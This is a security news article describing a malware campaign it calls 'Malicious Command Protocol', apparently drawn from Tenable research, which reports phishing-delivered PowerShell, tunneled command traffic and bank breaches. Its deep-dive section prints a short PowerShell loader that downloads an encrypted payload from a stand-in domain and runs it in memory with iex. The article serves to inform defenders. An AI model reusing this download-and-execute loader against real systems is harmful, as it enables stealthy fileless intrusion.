A sophisticated new attack technique known as Malicious Command Protocol (MCP) has emerged in recent weeks, raising significant concerns among cybersecurity professionals worldwide.
This novel threat leverages previously unexploited vulnerabilities in command and control infrastructures, allowing attackers to establish persistent connections while evading traditional detection methods.
Security researchers have observed MCP attacks targeting primarily financial institutions and critical infrastructure, with the malware’s ability to bypass conventional security measures making it particularly dangerous.
.png
)
The attack vectors employed by MCP are notably versatile, beginning with specially crafted phishing emails containing seemingly legitimate PowerShell scripts.
.webp)
Once executed, these scripts establish an encrypted communication channel with attacker-controlled servers using a technique called “protocol tunneling” that disguises malicious traffic as legitimate API calls.
This initial infection stage is remarkably stealthy, as it operates entirely in memory and leaves minimal forensic evidence on compromised systems.
Tenable researchers identified the malware during routine threat hunting operations when they noticed unusual API calls being made to cloud services from several client environments.
Through detailed analysis, researchers determined that MCP’s command structure mimics legitimate administrative tools, allowing it to operate under the radar of many security monitoring solutions.
“What makes MCP particularly concerning is its ability to adapt its communication patterns based on the environment it infects,” noted the lead Tenable analyst in their initial report.
The impact of MCP has already been substantial, with at least three major financial institutions reporting data exfiltration incidents linked to the malware.
Organizations infected with MCP have experienced extended periods of undetected compromise, with attackers maintaining access for an average of 47 days before discovery.
The economic impact of these breaches is still being assessed, but early estimates suggest remediation costs exceeding $2.3 million per incident.
Interestingly, the security community is already developing countermeasures based on MCP’s own techniques.
The very protocol mechanisms that make MCP effective are being repurposed to create more robust detection systems that can identify similar attack patterns in the future.
MCP Infection Mechanism Deep Dive
The infection process begins when a user executes what appears to be a benign PowerShell script. Below is a simplified version of the initial loader code:-
$s = New-Object System.Net.WebClient
$c = $s.DownloadString('https://legitimate-looking-domain.com/api/config')
$k = [System.Text.Encoding]::UTF8.GetBytes($env:COMPUTERNAME + $env:USERNAME)
$d = ConvertTo-SecureString $c -Key $k
iex ([System.Runtime.InteropServices.Marshal]::PtrToStringAuto([System.Runtime.InteropServices.Marshal]::SecureStringToBSTR($d)))This deceptively simple code downloads an encrypted payload, uses system-specific information as a decryption key, and executes the resulting commands directly in memory.
What makes this approach particularly effective is that it leaves no malware binary on disk for traditional antivirus solutions to detect.
The malware then establishes persistence by creating scheduled tasks that appear to be legitimate system maintenance operations.
The security industry’s rapid response to MCP demonstrates the ongoing evolution of cybersecurity defenses, with researchers already incorporating elements of MCP’s evasion techniques into next-generation security tools that promise better protection against similar threats in the future.
Are you from the SOC and DFIR Teams? – Analyse Malware Incidents & get live Access with ANY.RUN -> Start Now for Free.
